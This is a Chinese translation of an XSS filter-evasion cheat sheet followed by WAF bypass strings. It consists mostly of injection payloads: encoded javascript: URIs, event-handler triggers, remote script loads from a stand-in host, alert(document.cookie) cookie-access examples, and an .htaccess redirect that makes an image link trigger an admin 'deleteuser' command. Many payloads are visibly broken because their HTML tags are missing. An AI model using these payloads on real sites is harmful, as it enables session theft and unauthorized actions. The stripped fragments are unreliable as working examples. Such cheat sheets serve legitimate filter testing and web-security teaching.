XSS攻击向量

无防护的XSS测试

XSS定位器（Polygot）

以下是“ polygot测试XSS有效负载”。该测试将在多个上下文中执行，包括html，脚本字符串，js和url。

javascript:/*-->

使用JavaScript指令的图像XSS

（IE7.0在图像上下文中不支持JavaScript指令，但在其他上下文中支持JavaScript指令，但是以下内容也显示了在其他标记中也适用的原理：

"javascript:alert('XSS');">

没有引号，也没有分号

'XSS')>

不区分大小写的XSS攻击

'XSS')>

HTML实体要使用此功能，必须使用分号：

严重混淆

如果需要同时使用双引号和单引号，则可以使用重注释来封装JavaScript字符串-这也很有用，因为许多跨站点脚本过滤器都不知道注释：

"RSnake says, 'XSS'")`>

格式错误的A标签

\"alert(document.cookie)"\>xxs link\

IMG标签格式错误

""">"\>

从字符代码如果不允许任何形式的引号，则可以在JavaScript中eval（）一个fromCharCode来创建所需的任何XSS向量：

88,83,83))>

默认SRC标记可获取过去检查SRC域的过滤器这将绕过大多数SRC域过滤器。在事件方法中插入javascript还将适用于使用诸如Form，Iframe，Input，Embed等元素的任何HTML标记类型注入。它还将允许替换所有与标记类型相关的事件，例如onblur，onclick

"alert('xxs')">

保留默认的SRC标签为空

"alert('xxs')">

通过完全省略默认SRC标签

"alert('xxs')">

错误提示时

"alert(String.fromCharCode(88,83,83))">

IMG onerror和JavaScript警报编码

"javascript:alert('XSS')">

十进制HTML字符引用在

106;avascript:alert('XSS')>

十进制HTML字符引用，不带分号这在尝试查找“＆＃XX;”的XSS中通常很有效，因为大多数人都不知道填充-最多7个数字字符。这对于使用$ tmp_string =?s /.*\&#（\ d +）;。* / $ 1 /;等字符串进行解码的人也很有用。这错误地假设终止HTML编码的字符串需要使用分号：

0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

十六进制HTML字符引用，不带分号这也是对上述字符串$ tmp_string =?s /.*\&#（\ d +）;。* / $ 1 /;的可行的XSS攻击。假设井号后面有一个数字字符-十六进制HTML字符则不正确）。



嵌入式标签用于跨站脚本攻击：

"jav  ascript:alert('XSS');">

嵌入式编码标签使用这个来分解XSS：

"jav	ascript:alert('XSS');">

嵌入式换行符分解XSS

"jav
ascript:alert('XSS');">

嵌入式托架返回将分解XSS

"jav
ascript:alert('XSS');">

Null分解JavaScript指令Null字符也可以用作XSS向量，但与上面不同，你需要使用Burp Proxy之类的东西直接注入它们，或者在URL字符串中使用％00，或者如果您想编写自己的注入工具，则可以使用vim（^ V ^ @将产生一个null）或以下程序将其生成为文本文件。好的，我再次撒谎，旧版本的Opera（在Windows上大约为7.11）容易受到另一个char 173（软hypen控制char）的攻击。但是null char％00更为有用，它帮助我绕过了某些真实世界的过滤器，并带有以下示例：

perl -e 'print "";' > out

XSS图像中JavaScript之前的空格和元字符如果模式匹配未考虑javascript单词中的空格，这将非常有用：-正确，因为它不会呈现-并做出错误的假设，即引号和javascript之间不能有空格：关键词。实际情况是，您可以使用1-32的任何十进制字符：

"   javascript:alert('XSS');">

非字母非数字XSSFirefox HTML解析器假定在HTML关键字之后非字母非数字无效，因此将其视为HTML标记后的空格或无效令牌。问题在于，某些XSS过滤器假定它们要查找的标签已被空格分隔。例如\ != \

"XSS")>

<

`('XSS')"

XSS

Set.constructor`alert\x28document.domain\x29```

• FSCommand（）（从嵌入式Flash对象执行时，攻击者可以使用它）

• onAbort（）（当用户中止图像加载时）

• onActivate（）（将对象设置为活动元素时）

• onAfterPrint（）（在用户打印或预览打印作业后激活）

• onAfterUpdate（）（在更新源对象中的数据之后在数据对象上激活）

• onBeforeActivate（）（在将对象设置为活动元素之前触发）

• onBeforeCopy（）（攻击者在将选择内容复制到剪贴板之前立即执行攻击字符串-攻击者可以使用execCommand（“ Copy”）函数来执行此操作）

• onBeforeCut（）（攻击者在剪切选择之前立即执行攻击字符串）

• onBeforeDeactivate（）（从当前对象更改activeElement之后立即触发）

• onBeforeEditFocus（）（在包含在可编辑元素中的对象进入UI激活状态之前，或者在选择控件时选择可编辑容器对象时触发）

• onBeforePaste（）（需要通过使用execCommand（“ Paste”）函数来欺骗用户或强制将其粘贴）

• onBeforePrint（）（可能需要诱骗用户进行打印，否则攻击者可以使用print（）或execCommand（“ Print”）函数）。

• onBeforeUnload（）（将需要诱使用户关闭浏览器-攻击者无法卸载窗口，除非它是从父窗口派生的）

• onBeforeUpdate（）（在更新源对象中的数据之前在数据对象上激活）

• onBegin（）（onbegin事件在元素的时间轴开始时立即触发）

• onBlur（）（在加载另一个弹出窗口且窗口失去焦点的情况下）

• onBounce（）（当选取框对象的行为属性设置为“ alternate”且选取框的内容到达窗口的一侧时触发）

• onCellChange（）（当数据提供者中的数据更改时触发）

• onChange（）（选择，文本或TEXTAREA字段失去焦点，并且其值已被修改）

• onClick（）（有人单击表单）

• onContextMenu（）（用户需要右键单击攻击区域）

• onControlSelect（）（在用户将要对对象进行控件选择时触发）

• onCopy（）（用户需要复制某些内容，或者可以使用execCommand（“ Copy”）命令来利用它）

• onCut（）（用户需要复制某些内容，或者可以使用execCommand（“ Cut”）命令加以利用）

• onDataAvailable（）（用户需要更改元素中的数据，否则攻击者可以执行相同的功能）

• onDataSetChanged（）（当数据源对象公开的数据集发生更改时触发）

• onDataSetComplete（）（触发表明所有数据都可从数据源对象获得）

• onDblClick（）（用户双击表单元素或链接）

• onDeactivate（）（当activeElement从当前对象更改为父文档中的另一个对象时触发）

• onDrag（）（要求用户拖动一个对象）

• onDragEnd（）（要求用户拖动一个对象）

• onDragLeave（）（要求用户将对象拖离有效位置）

• onDragEnter（）（要求用户将对象拖到有效位置）

• onDragOver（）（要求用户将对象拖到有效位置）

• onDragDrop（）（用户将对象（例如文件）拖放到浏览器窗口中）

• onDragStart（）（在用户开始拖动操作时发生）

• onDrop（）（用户将对象（例如文件）拖放到浏览器窗口中）

• onEnd（）（时间轴结束时会触发onEnd事件。

• onError（）（加载文档或图像会导致错误）

• onErrorUpdate（）（在更新数据源对象中的关联数据时发生错误时，在数据绑定对象上触发）

• onFilterChange（）（在视觉过滤器完成状态更改时触发）

• onFinish（）（字幕在循环结束时可以创建攻击程序）

• onFocus（）（攻击者在窗口获得焦点时执行攻击字符串）

• onFocusIn（）（当窗口获得焦点时，攻击者执行攻击字符串）

• onFocusOut（）（当窗口失去焦点时攻击者执行攻击字符串）

• onHashChange（）（在文档当前地址的片段标识符部分更改时触发）

• onHelp（）（当用户在窗口处于焦点位置时按下F1时，攻击者执行攻击字符串）

• onInput（）（通过用户界面更改元素的文本内容）

• onKeyDown（）（用户按下一个键）

• onKeyPress（）（用户按下或按住一个键）

• onKeyUp（）（用户释放密钥）

• onLayoutComplete（）（用户必须打印或打印预览）

• onLoad（）（攻击者在窗口加载后执行攻击字符串）

• onLoseCapture（）（可以由releaseCapture（）方法利用）

• onMediaComplete（）（使用流媒体文件时，此事件可能在文件开始播放之前触发）

• onMediaError（）（用户在浏览器中打开一个包含媒体文件的页面，并在出现问题时触发该事件）

• onMessage（）（在文档收到消息时触发）

• onMouseDown（）（攻击者需要使用户单击图像）

• onMouseEnter（）（光标移至对象或区域上）

• onMouseLeave（）（攻击者需要使用户将鼠标悬停在图像或表格上，然后再次关闭）

• onMouseMove（）（攻击者需要使用户将鼠标悬停在图像或表格上）

• onMouseOut（）（攻击者需要使用户将鼠标悬停在图像或表格上，然后再次关闭）

• onMouseOver（）（光标移到对象或区域上）

• onMouseUp（）（攻击者需要使用户单击图像）

• onMouseWheel（）（攻击者将需要使用户使用其鼠标滚轮）

• onMove（）（用户或攻击者将移动页面）

• onMoveEnd（）（用户或攻击者将移动页面）

• onMoveStart（）（用户或攻击者将移动页面）

• onOffline（）（在浏览器以联机模式运行并且开始脱机工作时发生）

• onOnline（）（在浏览器以脱机模式工作并且开始在线工作时发生）

• onOutOfSync（）（中断时间线定义的元素播放媒体的能力）

• onPaste（）（用户需要粘贴，否则攻击者可以使用execCommand（“ Paste”）函数）

• onPause（）（onpause事件在时间轴暂停时在活动的每个元素上触发，包括body元素）

• onPopState（）（在用户浏览会话历史记录时触发）

• onProgress（）（攻击者会在加载Flash电影时使用它）

• onPropertyChange（）（用户或攻击者将需要更改元素属性）

• onReadyStateChange（）（用户或攻击者需要更改元素属性）

• onRedo（）（用户在撤消交易历史记录中前进）

• onRepeat（）（时间轴的每次重复触发一次事件，不包括第一个完整周期）

• onReset（）（用户或攻击者重置表单）

• onResize（）（用户将调整窗口大小；攻击者可以使用类似以下内容的方法自动初始化：">

  假设您只能容纳几个字符，并且针对.js进行过滤

  您可以将JavaScript文件重命名为XSS矢量图像：

  SSI（包括服务器端）这要求将SSI安装在服务器上才能使用此XSS向量。我可能不需要提及这一点，但是如果你可以在服务器上运行命令，那么毫无疑问，这将是更为严重的问题：

  PHP需要在服务器上安装PHP才能使用此XSS向量。同样，如果您可以像这样远程运行任何脚本，则可能存在更多可怕的问题：

  <? echo('echo('IPT>alert("XSS")'); ?>

  
  IMG嵌入式命令当注入该网页的网页（如网页板）位于密码保护之后并且该密码保护可与同一域中的其他命令一起使用时，此功能将起作用。这可用于删除用户，添加用户（如果访问该页面的用户是管理员），在其他位置发送凭据等...。这是较少使用但更有用的XSS向量之一：

  
  IMG嵌入式命令第二部分这更令人恐惧，因为除了它不是托管在您自己的域中之外，绝对没有其他标识符使它看起来可疑。该向量使用302或304（其他方法也可以）将图像重定向回命令。因此，正常的实际上可能是攻击者，他们以查看图像链接的用户身份运行命令。这是.htaccess（在Apache下）这一行来完成矢量（感谢Timo的帮助）：

  Redirect 302 /a.jpg http://360kuaishi.com/admin.asp&deleteuser

  
  Cookie操作诚然，这是相当晦涩的，但是我看到了一些允许

  alert('XSS')">

  
  UTF-7编码如果XSS所在的页面没有提供页面字符集标头，或者使用以下设置可以利用任何设置为UTF-7编码的浏览器（感谢Roman Ivanov）。单击此处获取示例（如果将用户的浏览器设置为自动检测并且在IE呈现引擎模式下的Internet Explorer和Netscape 8.1中，页面上没有覆盖的内容类型，则不需要字符集语句）。在不更改编码类型的情况下，这在任何现代浏览器中均不起作用，这就是为什么将其标记为完全不受支持的原因。Watchfire在Google的自定义404脚本中发现了此漏洞：

   +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

  
  XSS使用HTML报价封装这已在IE中进行了测试，您的飞行里程可能会有所不同。要在允许

  用于在允许

  另一个XSS逃避相同的过滤器，/\

  " '' SRC="httx://xss.cc/xss.js">

  另一个XSS可以逃避相同的过滤器，/ \ 标签而不是远程脚本，那么我看到的唯一用于此XSS示例的东西就是状态机（当然，如果允许

  最后一个XSS攻击可以回避，/\

  ` SRC="httx://xss.cc/xss.js">

  这是一个XSS示例，该示例押注了正则表达式不会捕获一对匹配的引号，而是宁愿找到任何引号来不正确地终止参数字符串的事实：

  '>" SRC="httx://xss.cc/xss.js">

  这个XSS仍然令我担心，因为要在不阻止所有活动内容的情况下几乎不可能停止它：

  PT SRC="httx://xss.cc/xss.js">

  
  URL字符串逃避假设以编程方式禁止使用http://www.baidu.com/：
  IP与主机名

  XSS

  
  网址编码

  XSS

  
  DWORD编码注意：Dword编码还有其他变体-有关更多详细信息，请参见下面的IP模糊处理计算器：

  XSS

  
  十六进制编码允许的每个数字的总大小在第二个数字上可以看到的总共240个字符左右，并且由于十六进制数在0到F之间，因此不需要在第三个十六进制引号前加零）：

  XSS

  
  八进制编码再次允许填充，尽管您必须使每个类的填充总数保持在4个以上字符-如A类，B类等…：

  XSS

  
  Base64编码

  
  混合编码让我们混合并匹配基本编码，并添加一些标签和换行符-为什么浏览器允许这样做，我永远不会知道）。选项卡和换行符仅在用引号引起来时起作用：

  tt  p://6  6.000146.0x7.147/">XSS

  
  协议解析绕过//转换为http：//，从而节省了更多字节。当空间也是一个问题时，这确实很方便（少两个字符可以走很长一段路），并且可以轻松绕过正则表达式，例如（ht | f）tp（s）？：//（感谢Ozh的帮助）。您也可以将//更改为\\\\。您确实需要将斜杠保留在适当的位置，否则，它将被解释为相对路径URL。

  XSS

  
  Google“感到幸运”的第1部分。Firefox使用Google的“感到幸运”功能将用户重定向到您键入的任何关键字。因此，如果可利用的页面位于某个随机关键字的顶部（如您在此处看到的），则可以对任何Firefox用户使用该功能。它使用Firefox的关键字：协议。您可以使用以下关键字来连接多个关键字：例如XSS + RSnake。从2.0版开始，它不再在Firefox中起作用。

  XSS

  
  Google“感到幸运”的第2部分。由于使用了“幸运”功能，因此使用了一个非常小的技巧，似乎只能在Firefox上使用。与下一个不同，这在Opera中不起作用，因为Opera认为这是旧的HTTP Basic Auth网络钓鱼攻击，实际上不是。这只是格式错误的网址。如果在对话框上单击“确定”，它将起作用，但是由于错误的对话框，我说这是Opera所不支持的，并且从Firefox 2.0版开始不再支持：

  XSS

  
  Google“感到幸运”的第3部分。这使用了格式错误的URL，该URL似乎仅在Firefox和Opera中可用，因为如果实现了“感觉幸运”功能。与上述所有方法一样，它要求您在相关关键字（在本例中为“ google”）中在Google中排名第一：

  XSS

  
  删除CNAME与上述网址结合使用时，请删除“ www”。将对此设置正确的服务器另外节省4个字节，总共节省9个字节）：

  XSS

  
  DNS的额外点：

  XSS

  
  JavaScript链接位置：

  XSS

  
  内容替换为攻击媒介假设以编程方式将http://www.google.com/替换为空）。实际上，我通过使用转换过滤器本身（这里是一个示例）对几个独立的现实世界XSS过滤器使用了类似的攻击向量，以帮助创建攻击向量（即：java：\＆＃x09; script：已转换为Java脚本：， 可以在IE，Netscape 8.1+中以安全站点模式和Opera呈现）：

  XSS

  
  字符转义序列HTML和JavaScript中字符“ <”的所有可能组合。如上所示，其中大多数都不会开箱即用地呈现，但是许多可以在某些情况下呈现。

  <
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
&#x000003c
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C

  
  
  绕过WAF的方法–跨站点脚本一般问题
  ?存储的XSS
  如果攻击者设法将XSS推送通过过滤器，则WAF将无法阻止攻击进行。
  ?Javascript中反映的XSS

  Example: Exploitation: /?xss=500); alert(document.cookie);//

  基于DOM的XSS

  Example: Exploitation: /?xss=document.cookie

  通过请求重定向的XSS。?易受攻击的代码：

  ...header('Location: '.$_GET['param']);...

  以及：

  ...header('Refresh: 0; URL='.$_GET['param']); ...

  ?此请求不会通过WAF：

  /?param=<javascript:alert(document.cookie>)

  ?该请求将通过WAF，并且将在某些浏览器中进行XSS攻击。

  /?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

  XSS的WAF旁路字符串。

  <Img src = x onerror = "javascript: window.onerror = alert; throw XSS"><Video> <source onerror = "javascript: alert (XSS)"><Input value = "XSS" type = text><applet code="javascript:confirm(document.cookie);"><isindex x="javascript:" onmouseover="alert(XSS)">">SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))SCRIPT>"><img src="x:x" onerror="alert(XSS)">"><iframe src="javascript:alert(XSS)"><object data="javascript:alert(XSS)"><isindex type=image src=1 onerror=alert(XSS)><img src=x:alert(alt) onerror=eval(src) alt=0><img  src="x:gif" onerror="window['al\u0065rt'](0)">img><iframe/src="data:text/html,<meta content="
   1 
  ; JAVASCRIPT: alert(1)" http-equiv="refresh"/><svg><script xlink:href=data:,window.open('https://www.google.com/')>

  筛选器Bypass警报混淆

  (alert)(1)a=alert,a(1)[1].find(alert)top[“al”+”ert”](1)top[/al/.source+/ert/.source](1)al\u0065rt(1)top[‘al\145rt’](1)top[‘al\x65rt’](1)top[8680439..toString(30)](1)